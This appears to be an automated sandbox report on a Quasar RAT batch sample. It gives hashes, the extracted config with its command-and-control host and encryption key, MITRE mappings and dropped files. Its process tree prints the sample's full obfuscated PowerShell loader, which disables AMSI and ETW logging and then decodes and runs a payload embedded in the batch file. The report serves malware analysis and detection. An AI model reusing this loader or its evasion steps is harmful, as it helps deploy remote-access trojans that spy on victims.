quasar | 4a664bab85afe1b3d5013278ba99280506c1eb42bac4e7b23bcc932eda627c8b

General

Target

Client-built.exe.bat
Size

4.2MB
MD5

e8f9b123f6368338546d660e983af6b0
SHA1

d622ddcfbba5060244816540768925563a7c66c3
SHA256

4a664bab85afe1b3d5013278ba99280506c1eb42bac4e7b23bcc932eda627c8b
SHA512

6ad576a2dd1e73b2eb18c240bd4ac824850e431d800fc2d8c520f6a2b1ea8d50d01c008bcab5cb1cc5189f120fd331870fa25925a2994a8c1e84e265492e9f5c
SSDEEP

49152:eDzoesdQ9TpsKmiB/J73/gnGKmTi5wU50WU:Q

Score

10^/10

quasar fr execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

fr

C2

kdotisbetterfr.airdns.org:61875

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes

encryption_key
A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2888-32-0x0000027370BD0000-0x0000027370EF4000-memory.dmp	family_quasar

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

24 2888 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2888 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

2888 powershell.exe
2888 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2888 powershell.exe

flow	pid	process
24	2888	powershell.exe

pid	process
2888	powershell.exe

pid	process
2888	powershell.exe
2888	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2888	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.execsc.exe

description	pid	process	target process
PID 4040 wrote to memory of 2888	4040	cmd.exe	powershell.exe
PID 4040 wrote to memory of 2888	4040	cmd.exe	powershell.exe
PID 2888 wrote to memory of 3360	2888	powershell.exe	csc.exe
PID 2888 wrote to memory of 3360	2888	powershell.exe	csc.exe
PID 3360 wrote to memory of 396	3360	csc.exe	cvtres.exe
PID 3360 wrote to memory of 396	3360	csc.exe	cvtres.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat';if (.([char](((-18989 -Band 4925) + (-18989 -Bor 4925) + 5167 + 8981))+[char]((15592 - 5449 - 5372 - 4670))+[char]((7757 - 4149 - 3692 + 199))+[char]((6189 - 5510 - 4827 + 4264))+[char](((-712 -Band 8324) + (-712 -Bor 8324) - 9313 + 1746))+[char](((-4636 -Band 8829) + (-4636 -Bor 8829) - 9840 + 5727))+[char]((21086 - 6295 - 9972 - 4722))+[char]((13029 - 9372 + 5383 - 8924))+[char](((2214 -Band 3002) + (2214 -Bor 3002) + 14 - 5126))) ([SySTEM.Text.eNcODiNg]::UTf8.geTStRiNg([syStem.cOnVERt]::FROmBaSe64STRINg('JEVOVjp1c2VycHJvZmlsZVxE')) + [SySteM.teXt.encOding]::UTF8.geTStriNg((0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x5c, 0x52, 0x65, 0x73, 0x75, 0x6d, 0x65)) + [syStem.tEXT.encODing]::uTF8.gEtstRing((0x47, 0x72, 0x61, 0x6e, 0x74, 0x2e, 0x73, 0x79, 0x73)))) { exit };${kdOtLCJrxpwvng}=([systEM.tExt.eNcoDinG]::utf8.GeTSTrINg((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46)) + [SySTEm.TeXt.ENCOding]::UTF8.geTsTRIng([SysTem.conVeRt]::fROmbaSe64StRINg('QXV0b21hdGlvbi5BbXNpVXRpbHM=')));${k`DotvllZJgLtgx}=([SystEM.tEXt.ENcODInG]::uTF8.GETstrInG([sYStEm.COnVeRT]::FrOmbaSe64strIng('YW1zaUluaXRGYWlsZWQ=')));${KdOteJyma`PyhoD}=[REF].AssEmblY;${kdOtap`Yr`KnuXkZ}=${kdOt`EJYMapYHOD}.geTtype(${k`Dotl`CjrxpwvnG});$kdoTgnaGLeanqB=${kdoTaPyrkn`UXKz}.geTfIELD(${KdotvL`Lz`JgLtgx},([SysTeM.tExt.EnCODING]::uTF8.geTStrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));$KdOtgNaGLeanQb.sEtvaLUE($nULl,([BOol][chaR]));([REflEcTion.ASsemBlY]::LOaDwIthpARtIALnaME(((([sySTEM.text.eNcOdiNg]::utF8.GETStRing((0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x43, 0x6f, 0x72, 0x65)))))).GeTTYPe(((([SyStEm.TeXT.ENcOdING]::utF8.geTSTRInG((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105)) + [syStem.TExT.EncoDing]::utF8.gEtSTRing((99, 115, 46, 69, 118, 101, 110, 116, 105, 110, 103, 46, 69, 118, 101, 110, 116, 80, 114, 111)) + [SysTEm.tEXT.ENCOdinG]::UTF8.GETstring((0x76, 0x69, 0x64, 0x65, 0x72)))))).GETfIeLD(((([sYsTeM.TeXt.ENcOdiNg]::Utf8.GeTstRiNG((109, 95)) + [sySteM.texT.enCODInG]::UTF8.GEtSTring((0x65, 0x6e, 0x61, 0x62)) + [sYsTem.TeXt.eNCOdIng]::UTf8.geTSTRING((108, 101, 100))))),((([system.TeXt.EncOdInG]::utF8.gEtSTRinG((78, 111, 110, 80, 117, 98, 108, 105, 99, 44, 73, 110, 115, 116, 97, 110, 99, 101)))))).SetVaLuE([Ref].ASsEmbly.getType(((([systEm.Text.ENcODIng]::uTF8.GeTStriNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99, 105)) + [SYSteM.TEXT.ENCodIng]::Utf8.GEtSTrinG((0x6e, 0x67, 0x2e, 0x50, 0x53, 0x45, 0x74, 0x77, 0x4c, 0x6f, 0x67, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72)))))).GetfielD(((([SySTEM.teXT.eNcODiNG]::utf8.gETStRing((0x65, 0x74, 0x77, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72))))),((([SysTeM.TEXt.ENCoDInG]::utf8.gEtsTRinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))))).GetVAluE($nULl),0));.([char]((-257 - 1031 + 9766 - 8373))+[char]((1823 - 9768 + 8223 - 177))+[char](((-19562 -Band 889) + (-19562 -Bor 889) + 9885 + 8908))) ([tEXT.encodIng]::UTF8.gEtSTrING([CoNvErt]::FroMBAse64StriNg((.([char]((11498 - 2401 - 178 - 8848))+[char]((-11105 - 5194 + 7505 + 8895))+[char]((222 - 4618 + 153 + 4359))+[char]((-2637 - 1093 + 9286 - 5511))+[char](((-4650 -Band 9781) + (-4650 -Bor 9781) - 1475 - 3589))+[char]((3131 - 3111 + 154 - 63))+[char]((18786 - 6317 - 8092 - 4267))+[char](((-2844 -Band 5727) + (-2844 -Bor 5727) - 703 - 2064))+[char]((7821 - 9012 - 6084 + 7376))+[char]((4558 - 872 + 4205 - 7781))+[char](((15508 -Band 482) + (15508 -Bor 482) - 7709 - 8165))) $KDot_file -raw | .([char]((11950 - 980 - 4943 - 5944))+[char](((-8135 -Band 6460) + (-8135 -Bor 6460) - 479 + 2255))+[char](((-13228 -Band 3952) + (-13228 -Bor 3952) + 547 + 8837))+[char](((-19627 -Band 1554) + (-19627 -Bor 1554) + 9787 + 8387))+[char](((-21855 -Band 6576) + (-21855 -Bor 6576) + 9605 + 5773))+[char](((10719 -Band 1622) + (10719 -Bor 1622) - 4422 - 7803))+[char](((15556 -Band 721) + (15556 -Bor 721) - 9597 - 6635))+[char](((4849 -Band 877) + (4849 -Bor 877) - 2305 - 3338))+[char](((-13113 -Band 8015) + (-13113 -Bor 8015) + 3741 + 1473))+[char]((-17 - 8310 + 8801 - 360))+[char](((-8482 -Band 1532) + (-8482 -Bor 1532) + 8379 - 1324))+[char]((-1608 - 2948 - 4299 + 8965))+[char](((-7699 -Band 8648) + (-7699 -Bor 8648) + 538 - 1384))) (([SySTem.teXt.eNcOdiNg]::UTf8.GEtsTrinG(58)) + ([SyStem.TExT.ENcodinG]::utf8.gETstRINg([sYstem.cOnVert]::FRoMbaSe64strIng('OktET1Q6OiguKik='))))).MAtcHeS.GrouPS[1].vaLuE)))"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v1dllrpc\v1dllrpc.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3360
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C35.tmp" "c:\Users\Admin\AppData\Local\Temp\v1dllrpc\CSCC06B575DB96C4F8CAA2F2FE29D693C5.TMP"
      4⤵
      PID:396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7C35.tmp

Filesize
1KB

MD5
96d39d35df7ca54a90ee1644c8362156

SHA1
c299e8b3856f1613f58d40a6b9ae172efcb5d6ab

SHA256
04620dcd3f1ad1f53431f00ce5ea3b9de55bdbf4c3326d26a75877c0077006f2

SHA512
724f63d716ecbecc3feed2982cce6e98901f779bef231f545d8098a96ef93596085fb8bf5d11282bc44bc0bd86ad2d620cc624411ed9e00638f48e6603b35e3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ps0funf.g34.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\v1dllrpc\v1dllrpc.dll

Filesize
8KB

MD5
06a326a86ed4abe0cdab78c026a4bd4f

SHA1
fd5f74477f7d5f3d622bcb969e5d6682f7b2c68b

SHA256
b51cf33acc8cb44127fd437a7862a2aeee5823c4aaf663d1cd8dcdfb1268b76c

SHA512
d5397d097b95cf933a8b9c8368735f8a2292a68089b9461c4227f2e639a35fc33478aeba7e1a8d61282272c0c2c4a080026d86ac0a1df8728858021b7b125b2a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\v1dllrpc\CSCC06B575DB96C4F8CAA2F2FE29D693C5.TMP

Filesize
652B

MD5
a762f892605c3c0a7c68fb5cd49fba3a

SHA1
a5e91b4b9396374b57b777ecde97d96cc9c73ff4

SHA256
c1b93fc5488d50740a610795908f578548b57d204a7255db7c1924e00f5f3b5d

SHA512
246eda5b9db5a18126493e8eca2cce74500ec1347b46ae831d05e2bbc8eda717a6aa307ad685fed84a2e92ae4e18c419a4de2eca49903e25c541f45e2bbebbcc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\v1dllrpc\v1dllrpc.0.cs

Filesize
11KB

MD5
2baccf8bd40aaee5659a70165d301596

SHA1
52f6af554b3df57db81005dd6360f4bc39b93531

SHA256
6c6ca5f865d9346cd32d84e0122d1bf08051d8b53c47208cef44bd2bb6133884

SHA512
dfbe57879f918c029dc628cc27961d63eca88104e8e7fb3aba8c2d1696419d5010c2dfc7e690669835fa50a0344f1ec5f60f714db95112b18c8524e87d1bb51a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\v1dllrpc\v1dllrpc.cmdline

Filesize
369B

MD5
f9463f7ac16d9801a2e352b2c546e71b

SHA1
165b3b3e2d4e0d0b1638df856b568621d8c649ed

SHA256
67437cdc07ec7a0a298cce20ae612540a060b51825b191a80bff77f19671462a

SHA512
7ab35f5943e9334fae099fd3e1eaf09aa66ee339b3c555a31535cdf1ed8e555f759aa2db14e56e3c0b832e9a7578ff9cf59a259698e3647c939947f224f4c494

Download Submit
memory/2888-26-0x00000273706B0000-0x00000273706B8000-memory.dmp

Filesize
32KB

Download
memory/2888-29-0x00007FFD8AC70000-0x00007FFD8B732000-memory.dmp

Filesize
10.8MB

Download
memory/2888-12-0x00007FFD8AC70000-0x00007FFD8B732000-memory.dmp

Filesize
10.8MB

Download
memory/2888-11-0x00007FFD8AC70000-0x00007FFD8B732000-memory.dmp

Filesize
10.8MB

Download
memory/2888-0-0x00007FFD8AC73000-0x00007FFD8AC75000-memory.dmp

Filesize
8KB

Download
memory/2888-2-0x00000273706C0000-0x00000273706E2000-memory.dmp

Filesize
136KB

Download
memory/2888-28-0x00007FFD8AC73000-0x00007FFD8AC75000-memory.dmp

Filesize
8KB

Download
memory/2888-13-0x00007FFD8AC70000-0x00007FFD8B732000-memory.dmp

Filesize
10.8MB

Download
memory/2888-30-0x00007FFD8AC70000-0x00007FFD8B732000-memory.dmp

Filesize
10.8MB

Download
memory/2888-31-0x00007FFD8AC70000-0x00007FFD8B732000-memory.dmp

Filesize
10.8MB

Download
memory/2888-32-0x0000027370BD0000-0x0000027370EF4000-memory.dmp

Filesize
3.1MB

Download
memory/2888-33-0x0000027371440000-0x0000027371490000-memory.dmp

Filesize
320KB

Download
memory/2888-34-0x0000027371F70000-0x0000027372022000-memory.dmp

Filesize
712KB

Download
memory/2888-35-0x0000027372200000-0x00000273723C2000-memory.dmp

Filesize
1.8MB

Download

Analysis

Sharing